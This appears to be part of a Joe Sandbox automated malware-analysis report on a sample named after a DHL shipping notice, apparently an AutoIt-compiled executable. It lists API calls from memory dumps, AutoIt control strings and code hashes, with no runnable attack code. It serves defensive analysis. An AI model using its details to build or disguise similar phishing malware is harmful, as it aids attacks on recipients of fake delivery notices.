                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Time$FileSystem__aulldiv__time64
                                                                                        • String ID:
                                                                                        • API String ID: 2893107130-0
                                                                                        • Opcode ID: 4c25ec6fc51fbff44da57903b504c4622753938628ad5be8e5418bd0031466ab
                                                                                        • Instruction ID: 6fe31332f126fccebb3a6b7499fd7c3ba21769946831d6aecac801165abe6853
                                                                                        • Opcode Fuzzy Hash: 4c25ec6fc51fbff44da57903b504c4622753938628ad5be8e5418bd0031466ab
                                                                                        • Instruction Fuzzy Hash: 1F21AF726256108BC729CF29D881B56B3E1EFA9311B688F6CD0F5CB2C0CA34A909CB54
                                                                                        APIs
                                                                                        • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00C64C76
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: mouse_event
                                                                                        • String ID:
                                                                                        • API String ID: 2434400541-0
                                                                                        • Opcode ID: 5216324e8a273fa3f51eba3e328d8e2d29e68eaee775c0408af8a1e509992730
                                                                                        • Instruction ID: 897310d3765bad4b2394acee340a6b0c1cd1082f082e7999984d87e13620ad88
                                                                                        • Opcode Fuzzy Hash: 5216324e8a273fa3f51eba3e328d8e2d29e68eaee775c0408af8a1e509992730
                                                                                        • Instruction Fuzzy Hash: 3AD09EA416261979EC3C07209DDBF7E3109E3C1791F94954A7251952C1E8E46941A139
                                                                                        APIs
                                                                                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00C58389), ref: 00C587D1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: LogonUser
                                                                                        • String ID:
                                                                                        • API String ID: 1244722697-0
                                                                                        • Opcode ID: 27fc9f74db034fdf046c153293f12d6b84abffdd67abb52dea979338b8883a72
                                                                                        • Instruction ID: c7e803d0bc993411d96c6572ed8a3379a7c327bce79b84580a6495cb2c7a3c74
                                                                                        • Opcode Fuzzy Hash: 27fc9f74db034fdf046c153293f12d6b84abffdd67abb52dea979338b8883a72
                                                                                        • Instruction Fuzzy Hash: 34D09E3226450EAFEF019EA4DD05EAE3B69EB04B01F408511FE15D51A1C775D935AB60
                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00C2A12A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID:
                                                                                        • API String ID: 3192549508-0
                                                                                        • Opcode ID: a08c32fa052ffab0a46d7e3d5a2f45bbb72102077cfb976f8cccc8acd306aeeb
                                                                                        • Instruction ID: b7ea347d89df2fb2e8de11ea96f9074877cc93c3786db843448382c846cc1159
                                                                                        • Opcode Fuzzy Hash: a08c32fa052ffab0a46d7e3d5a2f45bbb72102077cfb976f8cccc8acd306aeeb
                                                                                        • Instruction Fuzzy Hash: E4A0113000020CAB8A002B82EC08A88BFACEA022A0B008020F80C800328B32A8228A88
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3b174469800f325b1acc0384dacee9db51cadf0e68da709dfb2daf8032ce619a
• Instruction ID: ba050ce96794ba9263b1046e8fe3a631518c03a7e94bd7b1bf53a48f0bc1b8e5
• Opcode Fuzzy Hash: 3b174469800f325b1acc0384dacee9db51cadf0e68da709dfb2daf8032ce619a
• Instruction Fuzzy Hash: 5722583490C506CBDF388A25C4A47BCB7A1FF42305F28816ADA668B592DB749ECDF741
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
• Instruction ID: 280b92b2ad6da3cb3de5c130414e845d635a925a204c8884bd733658fc906f3c
• Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
• Instruction Fuzzy Hash: 53C198322051B349DF2E463AA43403EFAA15EA27B131F076DD8B3CB9D4EE20DA25D610
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
• Instruction ID: b29688fecce5103424fd06d7acaa882e60fb5f79652b03264f22a6bf791b5760
• Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
• Instruction Fuzzy Hash: E5C175332051B349DF2E463AD43413EBAA15FA27B171F076DD8B2DB9D4EE10CA25D620
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
• Instruction ID: a6b0178af2f4ba52e0efeaf2c15cd5a30d79d6c32c477b68e6a008e86851cd6f
• Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
• Instruction Fuzzy Hash: A6C185362451B34ADF2E463A943413EBAA15EB27B131F076DDCB3CB9C4EE20CA65D610
APIs
• DeleteObject.GDI32(00000000), ref: 00C7785B
• DeleteObject.GDI32(00000000), ref: 00C7786D
• DestroyWindow.USER32 ref: 00C7787B
• GetDesktopWindow.USER32 ref: 00C77895
• GetWindowRect.USER32(00000000), ref: 00C7789C
• SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00C779DD
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00C779ED
• CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C77A35
• GetClientRect.USER32(00000000,?), ref: 00C77A41
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00C77A7B
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C77A9D
• GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C77AB0
• GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C77ABB
• GlobalLock.KERNEL32(00000000), ref: 00C77AC4
• ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C77AD3
• GlobalUnlock.KERNEL32(00000000), ref: 00C77ADC
• CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C77AE3
• GlobalFree.KERNEL32(00000000), ref: 00C77AEE
• CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C77B00
• OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00C92CAC,00000000), ref: 00C77B16
• GlobalFree.KERNEL32(00000000), ref: 00C77B26
• CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00C77B4C
• SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00C77B6B
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C77B8D
• ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C77D7A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
• String ID: $@U=u$AutoIt v3$DISPLAY$static
• API String ID: 2211948467-3613752883
• Opcode ID: d003be8a3cefa57a4654fe957a4636479ef84fcecda0bfced2a8e8e8c7fc2e8e
• Instruction ID: 38c857859eb677e34241c380c4a7534104296576e6e591f423adef90109ce436
• Opcode Fuzzy Hash: d003be8a3cefa57a4654fe957a4636479ef84fcecda0bfced2a8e8e8c7fc2e8e
• Instruction Fuzzy Hash: 40025B75900119EFDB14DFA4DC89FAE7BB9EF48310F148269F915AB2A1C730AD42CB64
APIs
• SetTextColor.GDI32(?,00000000), ref: 00C8A630
• GetSysColorBrush.USER32(0000000F), ref: 00C8A661
• GetSysColor.USER32(0000000F), ref: 00C8A66D
• SetBkColor.GDI32(?,000000FF), ref: 00C8A687
• SelectObject.GDI32(?,00000000), ref: 00C8A696
• InflateRect.USER32(?,000000FF,000000FF), ref: 00C8A6C1
• GetSysColor.USER32(00000010), ref: 00C8A6C9
• CreateSolidBrush.GDI32(00000000), ref: 00C8A6D0
• FrameRect.USER32(?,?,00000000), ref: 00C8A6DF
• DeleteObject.GDI32(00000000), ref: 00C8A6E6
• InflateRect.USER32(?,000000FE,000000FE), ref: 00C8A731
• FillRect.USER32(?,?,00000000), ref: 00C8A763
• GetWindowLongW.USER32(?,000000F0), ref: 00C8A78E
  • Part of subcall function 00C8A8CA: GetSysColor.USER32(00000012), ref: 00C8A903
  • Part of subcall function 00C8A8CA: SetTextColor.GDI32(?,?), ref: 00C8A907
  • Part of subcall function 00C8A8CA: GetSysColorBrush.USER32(0000000F), ref: 00C8A91D
  • Part of subcall function 00C8A8CA: GetSysColor.USER32(0000000F), ref: 00C8A928
  • Part of subcall function 00C8A8CA: GetSysColor.USER32(00000011), ref: 00C8A945
  • Part of subcall function 00C8A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C8A953
  • Part of subcall function 00C8A8CA: SelectObject.GDI32(?,00000000), ref: 00C8A964
  • Part of subcall function 00C8A8CA: SetBkColor.GDI32(?,00000000), ref: 00C8A96D
  • Part of subcall function 00C8A8CA: SelectObject.GDI32(?,?), ref: 00C8A97A
  • Part of subcall function 00C8A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00C8A999
  • Part of subcall function 00C8A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C8A9B0
  • Part of subcall function 00C8A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00C8A9C5
  • Part of subcall function 00C8A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C8A9ED
Strings
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
• String ID: @U=u
• API String ID: 3521893082-2594219639
• Opcode ID: 33984706fe950c794068038e5f0887c715499e4a6bafbb25e48aa864a6586cff
• Instruction ID: 535a02d1ae6b3d9855fa59fef470c9c1ed0e4eb2e91fe1b5313edfdc79e17b55
• Opcode Fuzzy Hash: 33984706fe950c794068038e5f0887c715499e4a6bafbb25e48aa864a6586cff
• Instruction Fuzzy Hash: 53917B72408301AFD710AF64DC08B5F7BA9FB89325F100B2EF9A2961A0D770D946DB5A
APIs
• CharUpperBuffW.USER32(?,?,00C8F910), ref: 00C83627
• IsWindowVisible.USER32(?), ref: 00C8364B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: BuffCharUpperVisibleWindow
• String ID: @U=u$ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
• API String ID: 4105515805-3469695742
• Opcode ID: 6afa51c0325db033dcc6b09df95375847727d94006a553b1ada200fc510f712c
• Instruction ID: 25d28c8b7ed0bb8b6608f269510f189e98fd68f3fc970184393f558e020f077e
• Opcode Fuzzy Hash: 6afa51c0325db033dcc6b09df95375847727d94006a553b1ada200fc510f712c
• Instruction Fuzzy Hash: BCD19B70208240DBCB04FF10C491AAE77A5EF95758F144469F8926B3E3DB31EE4AEB49
APIs
• DestroyWindow.USER32(?,?,?), ref: 00C02CA2
• DeleteObject.GDI32(00000000), ref: 00C02CE8
• DeleteObject.GDI32(00000000), ref: 00C02CF3
• DestroyIcon.USER32(00000000,?,?,?), ref: 00C02CFE
• DestroyWindow.USER32(00000000,?,?,?), ref: 00C02D09
• SendMessageW.USER32(?,00001308,?,00000000), ref: 00C3C43B
• ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00C3C474
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00C3C89D
  • Part of subcall function 00C01B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C02036,?,00000000,?,?,?,?,00C016CB,00000000,?), ref: 00C01B9A
• SendMessageW.USER32(?,00001053), ref: 00C3C8DA
• SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00C3C8F1
• ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00C3C907
• ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00C3C912
Strings
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
• String ID: 0$@U=u
• API String ID: 464785882-975001249
• Opcode ID: 50990514e575f30ea269517495f80c205b8f266624c69528bd56686546b59616
• Instruction ID: 8e585f7831565bd2d856315c4593cb905ad480bab6f7a57f4b08a5923286d33c
• Opcode Fuzzy Hash: 50990514e575f30ea269517495f80c205b8f266624c69528bd56686546b59616
• Instruction Fuzzy Hash: 77127C30614201EFEB25CF24C8C8BADB7E5BF45304F544569F8A5EB2A2C731E952DB91
APIs
• DestroyWindow.USER32(00000000), ref: 00C774DE
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00C7759D
• SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00C775DB
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00C775ED
• CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00C77633
• GetClientRect.USER32(00000000,?), ref: 00C7763F
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00C77683
• CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C77692
• GetStockObject.GDI32(00000011), ref: 00C776A2
• SelectObject.GDI32(00000000,00000000), ref: 00C776A6
• GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00C776B6
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C776BF
• DeleteDC.GDI32(00000000), ref: 00C776C8
• CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00C776F4
• SendMessageW.USER32(00000030,00000000,00000001), ref: 00C7770B
• CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00C77746
• SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00C7775A
• SendMessageW.USER32(00000404,00000001,00000000), ref: 00C7776B
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00C7779B
• GetStockObject.GDI32(00000011), ref: 00C777A6
                                                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00C777B1
                                                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00C777BB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                        • String ID: @U=u$AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                        • API String ID: 2910397461-2771358697
                                                                                        • Opcode ID: 0760caac03446900443f3fd8cd2218b3f2c61aa6baa0711e4ccfb59e0f585c9c
                                                                                        • Instruction ID: 15cdd340ad2332df779b480fbbb2465e65ccdb0f0999b7880ffd7d889dc4bc26
                                                                                        • Opcode Fuzzy Hash: 0760caac03446900443f3fd8cd2218b3f2c61aa6baa0711e4ccfb59e0f585c9c
                                                                                        • Instruction Fuzzy Hash: 09A155B1A40619BFEB14DBA4DC49FAE7BB9EB04710F108218FA15E72E1D770AD41CB64
APIs
• GetSysColor.USER32(00000012), ref: 00C8A903
• SetTextColor.GDI32(?,?), ref: 00C8A907
• GetSysColorBrush.USER32(0000000F), ref: 00C8A91D
• GetSysColor.USER32(0000000F), ref: 00C8A928
• CreateSolidBrush.GDI32(?), ref: 00C8A92D
• GetSysColor.USER32(00000011), ref: 00C8A945
• CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C8A953
• SelectObject.GDI32(?,00000000), ref: 00C8A964
• SetBkColor.GDI32(?,00000000), ref: 00C8A96D
• SelectObject.GDI32(?,?), ref: 00C8A97A
• InflateRect.USER32(?,000000FF,000000FF), ref: 00C8A999
• RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C8A9B0
• GetWindowLongW.USER32(00000000,000000F0), ref: 00C8A9C5
• SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C8A9ED
• GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00C8AA14
• InflateRect.USER32(?,000000FD,000000FD), ref: 00C8AA32
• DrawFocusRect.USER32(?,?), ref: 00C8AA3D
• GetSysColor.USER32(00000011), ref: 00C8AA4B
• SetTextColor.GDI32(?,00000000), ref: 00C8AA53
• DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00C8AA67
• SelectObject.GDI32(?,00C8A5FA), ref: 00C8AA7E
• DeleteObject.GDI32(?), ref: 00C8AA89
• SelectObject.GDI32(?,?), ref: 00C8AA8F
• DeleteObject.GDI32(?), ref: 00C8AA94
• SetTextColor.GDI32(?,?), ref: 00C8AA9A
• SetBkColor.GDI32(?,?), ref: 00C8AAA4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
• String ID: @U=u
• API String ID: 1996641542-2594219639
• Opcode ID: 3acfbed86cc1bc2eb8c741313a96444b919769e00e3f6cd6c3bc5d006074f1ad
• Instruction ID: 618160feda563375bd31788a9c2e701a84579be1aaee1ab5070125aacc231376
• Opcode Fuzzy Hash: 3acfbed86cc1bc2eb8c741313a96444b919769e00e3f6cd6c3bc5d006074f1ad
• Instruction Fuzzy Hash: 7A514E71900208FFDB119FA4DC48FAE7B79EF08320F21422AF911AB2A1D7759A41DF94
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00C6AD1E
• GetDriveTypeW.KERNEL32(?,00C8FAC0,?,\\.\,00C8F910), ref: 00C6ADFB
• SetErrorMode.KERNEL32(00000000,00C8FAC0,?,\\.\,00C8F910), ref: 00C6AF59
Strings
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
